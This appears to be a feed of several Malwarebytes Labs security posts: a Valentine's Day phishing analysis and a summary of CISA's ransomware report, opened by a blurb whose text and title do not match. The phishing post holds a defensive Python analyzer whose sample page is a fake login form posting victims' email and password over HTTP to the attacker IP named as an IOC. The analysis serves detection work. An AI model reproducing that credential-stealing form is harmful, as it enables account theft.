Backups are a vitally important last line of defence against ransomware, but they often fail when people need them most. In a recent Malwarebytes Lock and Code podcast, host David Ruiz spoke with Matt Crape, technical account manager for VMware, about why backups are so hard to get right, and what the most basic missteps are when companies roll out a backup plan.


The post Ransomware gang hits 49ers’ network before Super Bowl kick off appeared first on Malwarebytes Labs.

Don’t let scammers ruin your Valentine’s Day

Today is Valentine’s Day, so we thought we’d show you how cybercriminals use special times like this one for phishing attacks.

Our Valentine’s story starts with a victim receiving an email message. The email urges them to open an attached file, and also contains well-formatted content that tries to divert attention from the real scam:

[Image: Phishing email]

These emails were sent from a legitimate account owned by artifactuprising.com, a well-known company located in Colorado that sells various gifts. The email contains several links to their website, and its content isn’t malicious by itself. The scam is placed in the first lines, where it says:

Hello,

Please find the attached details of the funds that will be deposited into your bank account within the next few days by electronic funds transfer (EFT).

Any questions related to invoices or payments, please contact our payables department.

*Please do not reply to this email as it was generated automatically.

Thank you,

The malicious artifact, then, is the attachment that supposedly contains details about funds deposited in the victim’s bank account. This malicious document is an HTML file. When opened with a regular text editor, the file appears to contain just JavaScript code:

[Image: Malicious attachment]

This JavaScript one-liner is just the means the attackers use to hide the real malicious HTML document. Some security products also fail to detect it, because the JS code contains no explicitly malicious strings.

After unescaping the code and doing some deobfuscation work, we can see the suspicious elements contained in the file, which give us an idea of the attack:

[Image: Fragment of malicious HTML file after deobfuscation]

As expected, what is shown to the user is a page that mimics an Outlook login page. Inexperienced users, or in fact anyone who doesn’t pay enough attention, could enter their credentials in the form. Note that the email address shown is unique per victim, which increases the legitimate look of the attack:

[Image: Form used in the phishing attack]

In the end, the fake form sends the stolen credentials to the attacker through a plain HTTP request to a malicious IP address under the attackers’ control. The ai form field will contain the victim’s email address, and the pr field the password:

[Image: Detonation in a controlled environment]

The IP address used is hosted in the USA and was used in the past as a Cobalt Strike server. It appears to host an outdated Apache server version that is being leveraged by different attackers in various attacks.
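The unescape-and-inspect step described above can be done statically, without ever rendering the attachment. As an added example (not code from the original post or from Malwarebytes), the Python below peels the `unescape()` wrapper with a JavaScript-compatible decoder, then flags the indicators this post describes: a form posting over plain HTTP to a bare IP address, a password field, and a pre-filled victim address. The only value taken from the article is the IP in its IOC list; the sample attachment, its `ai` and `pr` field names and the victim address are constructed, and the sample is built with `urllib.parse.quote` so that the block runs offline.

```python
"""Statically unpack an HTML attachment that hides its real page inside a
JavaScript unescape() one-liner, then flag credential-theft indicators.
Nothing is executed; the page is only decoded and pattern-matched."""
import re
from urllib.parse import quote, unquote, urlsplit

# The IP below is the IOC published in the article; everything else is constructed.
KNOWN_BAD_HOSTS = {"162.33.178.57"}

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FORM_ACTION_RE = re.compile(r"<form[^>]*\baction=[\"']([^\"']+)", re.I)


def js_unescape(text: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX code units, then %XX as Latin-1 bytes."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")


def unpack_layers(html: str, max_depth: int = 5) -> list:
    """Peel nested unescape() wrappers; returns [original, layer1, ...]."""
    layers = [html]
    for _ in range(max_depth):
        wrapped = UNESCAPE_RE.findall(layers[-1])
        if not wrapped:
            break
        layers.append("".join(js_unescape(body) for _, body in wrapped))
    return layers


def analyze_attachment(html: str) -> dict:
    """Decode the attachment and return the number of layers plus findings."""
    layers = unpack_layers(html)
    page = layers[-1]
    findings = []
    if len(layers) > 1:
        findings.append(f"{len(layers) - 1} unescape() layer(s) hide the real document")
    for action in FORM_ACTION_RE.findall(page):
        host = urlsplit(action).hostname or ""
        if action.lower().startswith("http://"):
            findings.append(f"form posts over plain HTTP to {action}")
        if IPV4_RE.match(host):
            findings.append(f"form action is a bare IP address: {host}")
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"form action host {host} matches a known IOC")
    if re.search(r"type=[\"']password", page, re.I):
        findings.append("decoded page contains a password field")
    for email in re.findall(r"value=[\"']([^\"'@]+@[^\"']+)", page):
        findings.append(f"victim address pre-filled: {email}")
    return {"layers": len(layers), "findings": findings}


# Constructed sample mirroring the attachment described above: a fake login
# form with 'ai' (email) and 'pr' (password) fields, hidden by one unescape().
_INNER_PAGE = (
    '<html><body><form method="post" action="http://162.33.178.57/post.php">'
    '<input type="hidden" name="ai" value="victim@example.test">'
    '<input type="password" name="pr">'
    '<input type="submit" value="Sign in"></form></body></html>'
)
SAMPLE_ATTACHMENT = (
    "<script>document.write(unescape('" + quote(_INNER_PAGE, safe="") + "'))</script>"
)

if __name__ == "__main__":
    for line in analyze_attachment(SAMPLE_ATTACHMENT)["findings"]:
        print("-", line)
```

On the constructed sample the analyzer reports one hidden layer and five content findings. Because it only decodes and pattern-matches, it is safe to run in a mail-gateway or triage pipeline; anything that uses `eval`, `document.write` indirection through string concatenation, or a second encoding would still need a sandbox detonation like the one shown in the screenshot above.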

Conclusion

We wish you a happy and secure Valentine’s Day, surrounded by the ones that you love. As you can see, phishing attacks nowadays look better than ever, and every one of us could be tricked. So remember to be suspicious of any email you weren’t expecting. Other indicators include topics like required payments or offers of free funds, as in this case. Moreover, be extra cautious when these emails urge you to respond quickly. And when doubt arises, don’t hesitate to share suspicious emails with your IT security department.

Malwarebytes users were already protected against this attack.

IOCs

162.33.178.57

The post Don’t let scammers ruin your Valentine’s Day appeared first on Malwarebytes Labs.

CISA Ransomware report warns “triple threat” attacks still on the prowl

Though we may be stuck with endless COVID-19 scams and a gradual visible rise in all manner of cryptocurrency hijinks, the old school attacks are as perilous as ever; CISA, the Cybersecurity & Infrastructure Security Agency, have released their 2021 report detailing the increasing globalised threat of the ransomware menace.

It covers a lot of ground, but many of the main findings won’t come as any surprise to those dealing with attacks over the last few years. Some of the more familiar efforts in the attack pipeline include:

  • Phishing and stolen RDP credentials used to break into networks and then fire up the ransomware cannon
  • Moving away from “big game” targets in order to go after much smaller ones. This keeps defenders with small security budgets on their toes, and also perhaps contributes to ransomware groups sailing under the radar. Nothing generates heat faster than major international attacks and lots of police involvement.
  • Attacking Managed Service Providers (MSPs). This allows ransomware authors to potentially take down several targets at once, should they manage to compromise the MSP.

Attacking the cloud is also popular. Not just because many instances of cloud applications are vulnerable to exploits, but also because a lot of businesses have their backups in the cloud, too. Your corporate backup plan in case of a ransomware attack won’t help if threat actors manage to encrypt all of the backups.

These are some of the techniques and strategies we’ve all come to see and also expect. But what else are they getting up to?

The triple threat

One of the most interesting parts of the report is the shift in how ransomware authors demand money, and also how they receive it. The days of the standard “Your PCs are encrypted, give us X amount in Bitcoin or you don’t get your files back” are no longer how everyone does it. The CISA summary highlights a type of ransomware attack that’s been growing in popularity for a while now:

Diversifying approaches to extorting money. After encrypting victim networks, ransomware threat actors increasingly used “triple extortion” by threatening to (1) publicly release stolen sensitive information, (2) disrupt the victim’s internet access, and/or (3) inform the victim’s partners, shareholders, or suppliers about the incident. The [Australian Cyber Security Centre] continued to observe “double extortion” incidents in which a threat actor uses a combination of encryption and data theft to pressure victims to pay ransom demands.

Not just regular extortion, or double extortion, but triple extortion! Telling everyone how badly you got it wrong, doubling down on shame and embarrassment, is going to have an impact. They’re plugging into the fear of the “big reveal” in a way that makes organisations fail to disclose ransomware incidents, or even wire fraud or anything else for that matter.

Ransomware authors in the driving seat

Triple threat extortion attempts featured heavily in the news halfway through last year. Any hopes they may have become a passing phase seem to be sadly mistaken.

As the years pass, so too does the threat escalation. Informing people and organisations you know, or work with, is one final insult. It’s the sextortion panic technique applied to the business environment. There’s nothing to stop the ransomware authors from doing what they want after getting onto the network, so why not? It’s win-win for them, which makes it essential to ensure they don’t ever get that far.

There is no end to ransomware attacks, or the type of data leaked via double or triple threat extortion. Here’s one such double-hitter from last Friday, and you can bet there’s a lot more happening this very second. One wonders what the quadruple-threat ransom will bring…

The post CISA Ransomware report warns “triple threat” attacks still on the prowl appeared first on Malwarebytes Labs.